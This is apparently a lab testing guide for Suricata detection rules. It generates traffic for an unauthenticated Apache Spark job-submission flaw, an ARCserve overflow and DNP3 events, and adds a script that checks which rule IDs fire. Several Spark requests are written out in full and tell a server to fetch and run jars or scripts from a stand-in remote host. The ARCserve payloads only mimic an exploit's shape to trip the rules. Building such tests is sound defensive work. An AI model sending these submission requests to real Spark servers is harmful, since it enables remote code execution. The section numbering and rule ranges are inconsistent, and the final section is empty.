Writing Suricata rules for the Spark unauthenticated-submission vulnerability, the ARCserve buffer overflow, and DNP3 cache erase: testing (9004135-9004152)
1. Test rules (9004135-9004146)
1. On host B, start a listener on 6066:

```shell
nc -l -k -p 6066 >/dev/null
```

2. On host B, capture the test traffic:

```shell
tshark -i eno2 -f "tcp port 6066 and host 10.10.10.1" -w spark_submit.pcap
```

3. On host A, send the requests to 6066. The Content-Length header must match the JSON body (the hard-coded values originally used here, e.g. 120 for a 96-byte body, produce an inconsistent HTTP transaction), so it is computed from the body by a small helper:

```shell
DST=10.10.10.2; PORT=6066

# send one JSON body to the given path with a Content-Length that matches it
send_req() {
    path=$1; body=$2
    printf 'POST %s HTTP/1.1\r\nHost: %s\r\nContent-Type: application/json\r\nContent-Length: %d\r\n\r\n%s' \
        "$path" "$DST" "${#body}" "$body" | nc -n -w 2 "$DST" "$PORT" >/dev/null
}

# local jar on the versioned path
send_req /v1/submissions/create '{"action":"CreateSubmissionRequest","appResource":"file:/tmp/a.jar","mainClass":"com.test.Main"}'
# remote http jar on the un-versioned path
send_req /submissions/create '{"action":"CreateSubmissionRequest","appResource":"http://203.0.113.9/payload.jar","mainClass":"com.evil.Main"}'
# remote https jar
send_req /v1/submissions/create '{"action":"CreateSubmissionRequest","appResource":"https://203.0.113.9/payload.jar","mainClass":"com.evil.Main"}'
# remote python script run through PythonRunner
send_req /v1/submissions/create '{"action":"CreateSubmissionRequest","appResource":"http://203.0.113.9/p.py","mainClass":"org.apache.spark.deploy.PythonRunner"}'
# local jar, remote dependency via spark.jars
send_req /v1/submissions/create '{"action":"CreateSubmissionRequest","appResource":"file:/tmp/ok.jar","mainClass":"com.ok.Main","spark.jars":"http://203.0.113.9/x.jar"}'
# local jar, remote file via spark.files
send_req /v1/submissions/create '{"action":"CreateSubmissionRequest","appResource":"file:/tmp/ok.jar","mainClass":"com.ok.Main","spark.files":"http://203.0.113.9/a.conf"}'
# three identical submissions in a row
for i in 1 2 3; do
    send_req /v1/submissions/create '{"action":"CreateSubmissionRequest","appResource":"file:/tmp/a.jar","mainClass":"c.M"}'
done
```

4. On host B, analyse the captured traffic:

```shell
tshark -r spark_submit.pcap -q -z conv,tcp
tshark -r spark_submit.pcap -Y 'tcp.len>0' -T fields -e frame.number -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e tcp.stream
tshark -r spark_submit.pcap -o tcp.desegment_tcp_streams:TRUE -q -z follow,tcp,ascii,0
```
2. Test rules (9004147-9004152)
1. On host B, start a listener on 6050:

```shell
nc -l -k -p 6050 >/dev/null
```

2. On host B, capture the test traffic (same capture as in section 1, written to the file the analysis step reads):

```shell
tshark -i eno2 -f "tcp port 6050 and host 10.10.10.1" -w arcserve_6050.pcap
```

3. On host A, send the requests to 6050:

```python
import socket
import struct
from typing import Optional

DST_IP = "10.10.10.2"
DST_PORT = 6050


def build_payload(total_len: int, marker_offset: Optional[int], arg_len_at6: int) -> bytes:
    """
    Goal: hit the given rule set, which is written against absolute payload offsets:
    - payload[0:2], 16-bit LE: > 33 and < 8192 (filled with total_len)
    - payload[6:8], 16-bit LE: arg_len_at6
    - E8 03 at marker_offset (optional)
    - at least 430 bytes after the marker (isdataat:430,relative)
    """
    if not (33 < total_len < 8192):
        raise ValueError("total_len must be in (33, 8192) to satisfy the sid 9004147 byte_test")
    b = bytearray(b"\x00" * total_len)
    # offset 0: length-like field checked by sid 9004147
    b[0:2] = struct.pack("<H", total_len)
    # offset 6: the suspicious length field the exploit rules test
    b[6:8] = struct.pack("<H", arg_len_at6)
    # some non-zero filler so the payload is not all zeros; written before the
    # marker so that a marker placed below offset 128 is not overwritten
    for i in range(16, min(total_len, 128)):
        b[i] = (i * 7) & 0xFF
    # optional shape marker
    if marker_offset is not None:
        need_min = marker_offset + 2 + 430  # for isdataat:430,relative
        if total_len < need_min:
            raise ValueError(f"total_len too small for marker@{marker_offset}: need >= {need_min}")
        b[marker_offset:marker_offset + 2] = b"\xE8\x03"  # 0x03E8 little-endian
    return bytes(b)


def send_case(name: str, payload: bytes) -> None:
    print(f"[+] Sending {name}: len={len(payload)}")
    with socket.create_connection((DST_IP, DST_PORT), timeout=3) as s:
        s.sendall(payload)


def main() -> None:
    # 1) only the ctx.arcserve.ua context (len >= 64, valid length field), no shape marker
    p1 = build_payload(total_len=200, marker_offset=None, arg_len_at6=100)
    # 2) hits shape256 but not the exploit condition (offset-6 value not above 679)
    p2 = build_payload(total_len=1000, marker_offset=256, arg_len_at6=200)
    # 3) triggers sid 9004150: shape256 + offset6=680 (0x02A8)
    p3 = build_payload(total_len=1000, marker_offset=256, arg_len_at6=680)
    # 4) triggers sid 9004151: shape256 + offset6=2000, with a large enough payload (>=1024)
    #    If 9004151 does not fire in your environment because of the relative anchor,
    #    do not dwell on it; see the "pitfalls" note below.
    p4 = build_payload(total_len=1500, marker_offset=256, arg_len_at6=2000)
    # 5) triggers sid 9004152: shape384 + offset6=680
    p5 = build_payload(total_len=1100, marker_offset=384, arg_len_at6=680)

    send_case("case1_ctx_only", p1)
    send_case("case2_shape256_only", p2)
    send_case("case3_exploit_9004150", p3)
    send_case("case4_exploit_9004151", p4)
    send_case("case5_exploit_9004152", p5)


if __name__ == "__main__":
    main()
```

4. On host B, analyse the captured traffic:

```shell
tshark -r arcserve_6050.pcap -q -z conv,tcp
tshark -r arcserve_6050.pcap -Y 'tcp.port==6050' -T fields -e frame.number -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e tcp.stream -e tcp.len
tshark -r arcserve_6050.pcap -o tcp.desegment_tcp_streams:TRUE -q -z follow,tcp,ascii,0
```
3. Test rules (9004153-9004165)
1. On host B, start a listener:

```shell
nc -lkp 20000 >/dev/null
```

2. On host A, send the requests:

```python
import socket

DST_IP = "10.10.10.2"
DST_PORT = 20000


def send_event(event_id: int) -> None:
    # bytes 0..27 are padding so that the marker lands at offset 28
    padding = b"\x00" * 28
    # offset 28..29: 01 41
    # offset 30:     event_id
    payload = padding + b"\x01\x41" + bytes([event_id]) + b"\x00\x00\x00" + b"\xAA" * 32
    with socket.create_connection((DST_IP, DST_PORT), timeout=3) as s:
        s.sendall(payload)


if __name__ == "__main__":
    for eid in (10, 11, 12, 26, 27, 29, 31, 32, 33, 39, 45, 47):
        send_event(eid)
```
4. Test rules (9004166)
1. On host B, start a listener:

```shell
nc -lkp 20000 >/dev/null
```

2. On host A, send an oversized message:

```python
import socket

DST_IP = "10.10.10.2"
DST_PORT = 20000
SIZE = 9000

# one 9000-byte blob in a single connection
data = b"A" * SIZE
with socket.create_connection((DST_IP, DST_PORT), timeout=3) as s:
    s.sendall(data)
```
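Each section above stops at capturing the traffic and reading it back with tshark; the check a rule author actually needs is whether the expected SIDs fired when the capture is replayed through Suricata. The script below is an added example, not code from the original page: it runs `suricata -r` on each pcap with the rule file given on the command line, parses the alerts out of eve.json, and reports which expected SIDs are missing and which unrelated SIDs fired. Assumptions: `suricata` is on PATH; the expected SID ranges are taken from the section headings; the pcap names for sections 1 and 2 are the ones used in the tshark commands, while the capture for the port-20000 sections is not named on the page and is assumed here to be `dnp3_20000.pcap`; the eve.json lines in `SAMPLE_EVE` are constructed for a self-check and are not real Suricata output.

```python
import json
import os
import subprocess
import sys
import tempfile
from typing import Dict, Iterable, List, Set, Tuple

# Expected SID ranges per capture, taken from the section headings.
# dnp3_20000.pcap is an assumed file name; the page does not name that capture.
EXPECTED: Dict[str, Set[int]] = {
    "spark_submit.pcap": set(range(9004135, 9004147)),
    "arcserve_6050.pcap": set(range(9004147, 9004153)),
    "dnp3_20000.pcap": set(range(9004153, 9004167)),
}

# Constructed eve.json lines for the self-check (not real Suricata output).
SAMPLE_EVE: List[str] = [
    '{"event_type":"alert","src_ip":"10.10.10.1","dest_ip":"10.10.10.2",'
    '"alert":{"signature_id":9004135,"rev":1,"signature":"spark submit"}}',
    '{"event_type":"alert","alert":{"signature_id":9004135,"rev":1}}',
    '{"event_type":"alert","alert":{"signature_id":9004140,"rev":1}}',
    '{"event_type":"flow","flow":{"pkts_toserver":5}}',
    '{"event_type":"alert","alert":{"signature":"record without a sid"}}',
    "not json at all",
    '{"event_type":"alert","alert":{"signature_id":2100498,"rev":7}}',
]


def alert_sids(eve_lines: Iterable[str]) -> Dict[int, int]:
    """Count alerts per SID from eve.json lines; non-alert, malformed and sid-less records are skipped."""
    counts: Dict[int, int] = {}
    for line in eve_lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if rec.get("event_type") != "alert":
            continue
        sid = rec.get("alert", {}).get("signature_id")
        if isinstance(sid, int):
            counts[sid] = counts.get(sid, 0) + 1
    return counts


def compare(expected: Set[int], counts: Dict[int, int]) -> Tuple[Set[int], Set[int]]:
    """Return (missing, unexpected): expected SIDs that never fired, and fired SIDs outside the expected set."""
    fired = set(counts)
    return expected - fired, fired - expected


def run_suricata(pcap: str, rules: str) -> Dict[int, int]:
    """Replay one pcap through Suricata offline and return per-SID alert counts.

    -S loads only the given rule file; -k none skips checksum validation, which
    matters for captures taken on the sending host with checksum offload on.
    """
    with tempfile.TemporaryDirectory() as logdir:
        subprocess.run(
            ["suricata", "-r", pcap, "-S", rules, "-l", logdir, "-k", "none"],
            check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
        )
        with open(os.path.join(logdir, "eve.json"), encoding="utf-8") as fh:
            return alert_sids(fh)


def main(argv: List[str]) -> int:
    if len(argv) != 2:
        print(f"usage: {argv[0]} rules.rules", file=sys.stderr)
        return 2
    rc = 0
    for pcap, expected in EXPECTED.items():
        if not os.path.exists(pcap):
            print(f"{pcap}: not found, skipped")
            continue
        counts = run_suricata(pcap, argv[1])
        missing, unexpected = compare(expected, counts)
        print(f"{pcap}: fired={sorted(counts)} missing={sorted(missing)} unexpected={sorted(unexpected)}")
        if missing:
            rc = 1
    return rc


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it from the directory holding the pcaps as `python3 check_sids.py rules.rules`; a non-zero exit means at least one expected SID never fired, which is the signal that a rule's offsets, byte_test bounds or HTTP buffer choice need another look before the rule is shipped.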
5. Test rules (9004167)
